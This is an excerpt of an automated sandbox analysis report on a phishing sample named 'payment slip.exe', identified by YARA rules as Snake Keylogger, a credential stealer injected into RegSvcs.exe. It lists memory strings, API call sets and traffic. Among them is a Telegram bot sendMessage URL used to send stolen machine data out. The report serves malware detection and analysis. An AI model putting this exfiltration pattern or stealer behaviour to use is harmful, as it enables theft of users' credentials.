                  Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20a
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.00000000026B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.00000000026B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.00000000025DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.000000000256F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.000000000256F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.000000000259A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.00000000025DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.000000000259A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.00000000026E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000002.00000002.3839548945.00000000026E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49721 version: TLS 1.2
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_000AEAFF
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_000AED6A
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_000AEAFF
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0009AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0009AA57
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_000C9576

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: payment slip.exe PID: 6736, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 1104, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Binary is likely a compiled AutoIt script file
                  Source: payment slip.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: payment slip.exe, 00000000.00000000.1368466237.00000000000F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e84a762f-2
                  Source: payment slip.exe, 00000000.00000000.1368466237.00000000000F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3b147f7f-6
                  Source: payment slip.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c9ef72f2-7
                  Source: payment slip.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_64723eb9-1
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: payment slip.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0009D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0009D5EB
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00091201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00091201
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0009E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0009E8F6
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A20460_2_000A2046
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000380600_2_00038060
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000982980_2_00098298
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0006E4FF0_2_0006E4FF
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0006676B0_2_0006676B
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000C48730_2_000C4873
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0005CAA00_2_0005CAA0
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0003CAF00_2_0003CAF0
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0004CC390_2_0004CC39
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00066DD90_2_00066DD9
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0004B1190_2_0004B119
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000391C00_2_000391C0
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000513940_2_00051394
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000517060_2_00051706
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0005781B0_2_0005781B
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000379200_2_00037920
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0004997D0_2_0004997D
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000519B00_2_000519B0
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00057A4A0_2_00057A4A
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00051C770_2_00051C77
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00057CA70_2_00057CA7
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000BBE440_2_000BBE44
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00069EEE0_2_00069EEE
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00051F320_2_00051F32
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_03B036100_2_03B03610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B7A0882_2_00B7A088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B7C1462_2_00B7C146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B7D2782_2_00B7D278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B753622_2_00B75362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B7C4682_2_00B7C468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B7C7382_2_00B7C738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B769A02_2_00B769A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B7E9882_2_00B7E988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B7CA082_2_00B7CA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B7CCD82_2_00B7CCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B73E092_2_00B73E09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B7CFAA2_2_00B7CFAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B76FC82_2_00B76FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B739EE2_2_00B739EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B729EC2_2_00B729EC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B7E97A2_2_00B7E97A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00B7F9792_2_00B7F979
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F429682_2_05F42968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F495482_2_05F49548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F49C702_2_05F49C70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4FC682_2_05F4FC68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F450282_2_05F45028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4F3B82_2_05F4F3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F417A02_2_05F417A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F40B302_2_05F40B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F41E802_2_05F41E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4DDFF2_2_05F4DDFF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4D9A82_2_05F4D9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4D9992_2_05F4D999
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4D5502_2_05F4D550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4295A2_2_05F4295A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4D5402_2_05F4D540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4D0F82_2_05F4D0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4CCA02_2_05F4CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4CC8F2_2_05F4CC8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F400402_2_05F40040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4003F2_2_05F4003F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4F8102_2_05F4F810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F450182_2_05F45018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F400072_2_05F40007
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4F8012_2_05F4F801
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F49BF72_2_05F49BF7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F48BA02_2_05F48BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4F3A82_2_05F4F3A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F48B912_2_05F48B91
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4178F2_2_05F4178F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4EF602_2_05F4EF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4EF512_2_05F4EF51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F40B202_2_05F40B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F493282_2_05F49328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4EB082_2_05F4EB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4EAF82_2_05F4EAF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4E6B02_2_05F4E6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4E6AF2_2_05F4E6AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F41E702_2_05F41E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4E2582_2_05F4E258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4E2492_2_05F4E249
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F4DE002_2_05F4DE00
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: String function: 0004F9F2 appears 40 times
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: String function: 00039CB3 appears 31 times
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: String function: 00050A30 appears 46 times
                  Source: payment slip.exe, 00000000.00000003.1381716024.0000000003E2D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs payment slip.exe
                  Source: payment slip.exe, 00000000.00000003.1380782423.0000000003C83000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs payment slip.exe
                  Source: payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs payment slip.exe
                  Source: payment slip.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
